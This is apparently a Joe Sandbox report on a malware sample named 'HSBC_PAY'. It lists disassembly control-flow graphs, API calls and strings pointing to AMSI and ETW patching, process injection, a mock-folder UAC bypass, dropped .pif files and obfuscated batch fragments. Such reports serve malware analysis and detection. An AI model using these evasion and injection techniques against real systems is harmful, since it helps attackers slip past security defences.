                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                    • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                    • API String ID: 2010126900-181751239
                                                                    • Opcode ID: 0675f849d41536afe025ed880aae6c0875d6f2d43aa35112224153fbb6cf2e53
                                                                    • Instruction ID: e1fc6c54b8017b823d6967c35708f96f9187ab38856f5aed82f914e8583e3065
                                                                    • Opcode Fuzzy Hash: 0675f849d41536afe025ed880aae6c0875d6f2d43aa35112224153fbb6cf2e53
                                                                    • Instruction Fuzzy Hash: B2240B75A8025A9FDB25FB64DE90ADE73B6FF99314F1044E2A009A7214DF30AE81DF50

                                                                    Control-flow Graph: function 2aa7870-2aa7c5f (executed and not-executed basic blocks; notable calls on the rendered paths include CreateProcessAsUserW and ExitProcess; interactive graph not reproduced here)
2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a87e10 5555->5564 5820 2aa9212-2aa9413 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a849a4 call 2a98ba8 5564->5820 5821 2aa8f60-2aa920d call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84d8c * 2 call 2a84734 call 2a9dac4 5564->5821 5573->5574 5672 2aa7fc8-2aa82e8 call 2a849a4 call 2a9dc88 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a9cf9c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5574->5672 5673 2aa7fc3-2aa7fc6 5574->5673 5991 2aa82ea-2aa82fc call 2a9857c 5672->5991 5992 2aa8301-2aa8ae4 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c 
call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c ResumeThread call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c CloseHandle call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97ecc call 2a98798 * 6 CloseHandle call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 5672->5992 5673->5672 5820->5554 5821->5820 5991->5992 5992->5463
                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02BD57DC,02BD5820,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C), ref: 02AA7E31
                                                                    • ResumeThread.KERNEL32(00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0), ref: 02AA847B
                                                                    • CloseHandle.KERNEL32(00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,00000000,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C), ref: 02AA85FA
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                    • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02AE137C,02AAAFD0,UacInitialize,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,UacScan,02AE137C), ref: 02AA89EC
                                                                      • Part of subcall function 02A87E10: GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                      • Part of subcall function 02A9DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A9DB96), ref: 02A9DB03
                                                                      • Part of subcall function 02A9DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A9DB3D
                                                                      • Part of subcall function 02A9DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A9DB6A
                                                                      • Part of subcall function 02A9DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A9DB73
                                                                      • Part of subcall function 02A98184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A9820E), ref: 02A981F0
                                                                    • ExitProcess.KERNEL32(00000000,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,Initialize,02AE137C,02AAAFD0,00000000,00000000,00000000,ScanString,02AE137C,02AAAFD0), ref: 02AAAA1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                    • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                    • API String ID: 2481178504-1225450241
                                                                    • Opcode ID: be8d60313b7af05c6e58fbf9b9d78c2fe6847ba92ec9d6fbfd4769a9ef3d08f9
                                                                    • Instruction ID: 5671974baf2a714e0d5c611b242ba09e2fe7363118d53c33aaf8c459923a9ca6
                                                                    • Opcode Fuzzy Hash: be8d60313b7af05c6e58fbf9b9d78c2fe6847ba92ec9d6fbfd4769a9ef3d08f9
                                                                    • Instruction Fuzzy Hash: 7043D775A802199FDB25FB64DE909DE73F6BF99314F1084A6A00AA7214DF30AE81DF50

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8535 2a81724-2a81736 8536 2a81968-2a8196d 8535->8536 8537 2a8173c-2a8174c 8535->8537 8538 2a81a80-2a81a83 8536->8538 8539 2a81973-2a81984 8536->8539 8540 2a8174e-2a8175b 8537->8540 8541 2a817a4-2a817ad 8537->8541 8545 2a81a89-2a81a8b 8538->8545 8546 2a81684-2a816ad VirtualAlloc 8538->8546 8542 2a81938-2a81945 8539->8542 8543 2a81986-2a819a2 8539->8543 8547 2a8175d-2a8176a 8540->8547 8548 2a81774-2a81780 8540->8548 8541->8540 8544 2a817af-2a817bb 8541->8544 8542->8543 8552 2a81947-2a8195b Sleep 8542->8552 8549 2a819b0-2a819bf 8543->8549 8550 2a819a4-2a819ac 8543->8550 8544->8540 8551 2a817bd-2a817c9 8544->8551 8553 2a816df-2a816e5 8546->8553 8554 2a816af-2a816dc call 2a81644 8546->8554 8555 2a8176c-2a81770 8547->8555 8556 2a81794-2a817a1 8547->8556 8557 2a817f0-2a817f9 8548->8557 8558 2a81782-2a81790 8548->8558 8560 2a819d8-2a819e0 8549->8560 8561 2a819c1-2a819d5 8549->8561 8559 2a81a0c-2a81a22 8550->8559 8551->8540 8562 2a817cb-2a817de Sleep 8551->8562 8552->8543 8565 2a8195d-2a81964 Sleep 8552->8565 8554->8553 8563 2a817fb-2a81808 8557->8563 8564 2a8182c-2a81836 8557->8564 8571 2a81a3b-2a81a47 8559->8571 8572 2a81a24-2a81a32 8559->8572 8568 2a819fc-2a819fe call 2a815cc 8560->8568 8569 2a819e2-2a819fa 8560->8569 8561->8559 8562->8540 8567 2a817e4-2a817eb Sleep 8562->8567 8563->8564 8570 2a8180a-2a8181e Sleep 8563->8570 8573 2a818a8-2a818b4 8564->8573 8574 2a81838-2a81863 8564->8574 8565->8542 8567->8541 8578 2a81a03-2a81a0b 8568->8578 8569->8578 8570->8564 8580 2a81820-2a81827 Sleep 8570->8580 8584 2a81a68 8571->8584 8585 2a81a49-2a81a5c 8571->8585 8572->8571 8581 2a81a34 8572->8581 8576 2a818dc-2a818eb call 2a815cc 8573->8576 8577 2a818b6-2a818c8 8573->8577 8582 2a8187c-2a8188a 8574->8582 8583 2a81865-2a81873 8574->8583 8596 2a818fd-2a81936 8576->8596 8600 2a818ed-2a818f7 8576->8600 8587 2a818ca 8577->8587 8588 2a818cc-2a818da 8577->8588 8580->8563 8581->8571 8591 2a818f8 
8582->8591 8592 2a8188c-2a818a6 call 2a81500 8582->8592 8583->8582 8590 2a81875 8583->8590 8586 2a81a6d-2a81a7f 8584->8586 8585->8586 8593 2a81a5e-2a81a63 call 2a81500 8585->8593 8587->8588 8588->8596 8590->8582 8591->8596 8592->8596 8593->8586
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,02A81FC1), ref: 02A817D0
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02A81FC1), ref: 02A817E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: 0 $0`
                                                                    • API String ID: 3472027048-1112504500
                                                                    • Opcode ID: d249f3c9310b2fd163b29630ce70a79b6a4fc446426061558940b49576c1a32e
                                                                    • Instruction ID: 11b61a42860d8e648610486e502a74a4d88eed45d3c164ebc420f2fca3edae23
                                                                    • Opcode Fuzzy Hash: d249f3c9310b2fd163b29630ce70a79b6a4fc446426061558940b49576c1a32e
                                                                    • Instruction Fuzzy Hash: CAB1DD72A412518BDB15DF28DAC0365BBE1FB85324F1886AAD54ACF285EF70E453CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 10477 2a81a8c-2a81a9b 10478 2a81b6c-2a81b6f 10477->10478 10479 2a81aa1-2a81aa5 10477->10479 10480 2a81c5c-2a81c60 10478->10480 10481 2a81b75-2a81b7f 10478->10481 10482 2a81b08-2a81b11 10479->10482 10483 2a81aa7-2a81aae 10479->10483 10488 2a816e8-2a8170b call 2a81644 VirtualFree 10480->10488 10489 2a81c66-2a81c6b 10480->10489 10484 2a81b3c-2a81b49 10481->10484 10485 2a81b81-2a81b8d 10481->10485 10482->10483 10490 2a81b13-2a81b27 Sleep 10482->10490 10486 2a81adc-2a81ade 10483->10486 10487 2a81ab0-2a81abb 10483->10487 10484->10485 10499 2a81b4b-2a81b5f Sleep 10484->10499 10491 2a81b8f-2a81b92 10485->10491 10492 2a81bc4-2a81bd2 10485->10492 10496 2a81ae0-2a81af1 10486->10496 10497 2a81af3 10486->10497 10494 2a81abd-2a81ac2 10487->10494 10495 2a81ac4-2a81ad9 10487->10495 10507 2a8170d-2a81714 10488->10507 10508 2a81716 10488->10508 10490->10483 10498 2a81b2d-2a81b38 Sleep 10490->10498 10500 2a81b96-2a81b9a 10491->10500 10492->10500 10503 2a81bd4-2a81bd9 call 2a814c0 10492->10503 10496->10497 10502 2a81af6-2a81b03 10496->10502 10497->10502 10498->10482 10499->10485 10504 2a81b61-2a81b68 Sleep 10499->10504 10505 2a81bdc-2a81be9 10500->10505 10506 2a81b9c-2a81ba2 10500->10506 10502->10481 10503->10500 10504->10484 10505->10506 10514 2a81beb-2a81bf2 call 2a814c0 10505->10514 10510 2a81bf4-2a81bfe 10506->10510 10511 2a81ba4-2a81bc2 call 2a81500 10506->10511 10512 2a81719-2a81723 10507->10512 10508->10512 10515 2a81c2c-2a81c59 call 2a81560 10510->10515 10516 2a81c00-2a81c28 VirtualFree 10510->10516 10514->10506
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,02A81FE4), ref: 02A81B17
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A81FE4), ref: 02A81B31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: 0`
                                                                    • API String ID: 3472027048-3339448193
                                                                    • Opcode ID: 61c00b23833a4bf1faa5885c0c9850bbad6ea35c5ded7e6df48246288ead0255
                                                                    • Instruction ID: 8c2fbc6c83211a7b31b7a1a57a5d033771d9a4c2b01c43e15b2bdc459e8531c4
                                                                    • Opcode Fuzzy Hash: 61c00b23833a4bf1faa5885c0c9850bbad6ea35c5ded7e6df48246288ead0255
                                                                    • Instruction Fuzzy Hash: 9251B071A412408FE715EF68DAC8756BBE0AB45314F1885AED549CB282EF70D847CB91

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(amsi), ref: 02A9870D
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A9876C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                    • String ID: DllGetClassObject$W$amsi
                                                                    • API String ID: 941070894-2671292670
                                                                    • Opcode ID: d4c300fdb9f8c00d6ed4c1d1880efcecc6492a93f5479b8688aac4c40704a5e2
                                                                    • Instruction ID: 4fa4577b9fac62ccf5684e71748776bf7039c32f1dd4ca2ab93ab04df8d2decc
                                                                    • Opcode Fuzzy Hash: d4c300fdb9f8c00d6ed4c1d1880efcecc6492a93f5479b8688aac4c40704a5e2
                                                                    • Instruction Fuzzy Hash: BBF068A058C381B9E601E6758D45F4BBFCD4B52624F048A5CB1E85A2D2DE79D10487B7

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A9E42E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CheckConnectionInternet
                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                    • API String ID: 3847983778-3852638603
                                                                    • Opcode ID: 739a1a6631191be58239bf892cd6ee7c7b67c8c84fed8b395f3b8942b298cd5a
                                                                    • Instruction ID: 6d5091522a0934d2cb2be322b588c4ad8163a26bcdf27ee4c1fc96ea42b12ade
                                                                    • Opcode Fuzzy Hash: 739a1a6631191be58239bf892cd6ee7c7b67c8c84fed8b395f3b8942b298cd5a
                                                                    • Instruction Fuzzy Hash: 9D41FC31B90209AFEF10FBA4DA80A9EB7FABF8D710F118426E041A7241DE75AD018F50

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                    • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                    • String ID:
                                                                    • API String ID: 1543721669-0
                                                                    • Opcode ID: 76125371012240a292418b6c2f2b20c338d061306151cb01dc3ba5e2b72fb07a
                                                                    • Instruction ID: d2d3209d9fb062056cebd912cce300bb07c2e86a7e3fc8dd59665b769e9dd6ef
                                                                    • Opcode Fuzzy Hash: 76125371012240a292418b6c2f2b20c338d061306151cb01dc3ba5e2b72fb07a
                                                                    • Instruction Fuzzy Hash: EF115174A80315BFFF54FBA8CE01A5E77E9EB49700F5004A47509E7A80DE749D028B54
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • WinExec.KERNEL32(?,?), ref: 02A98470
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
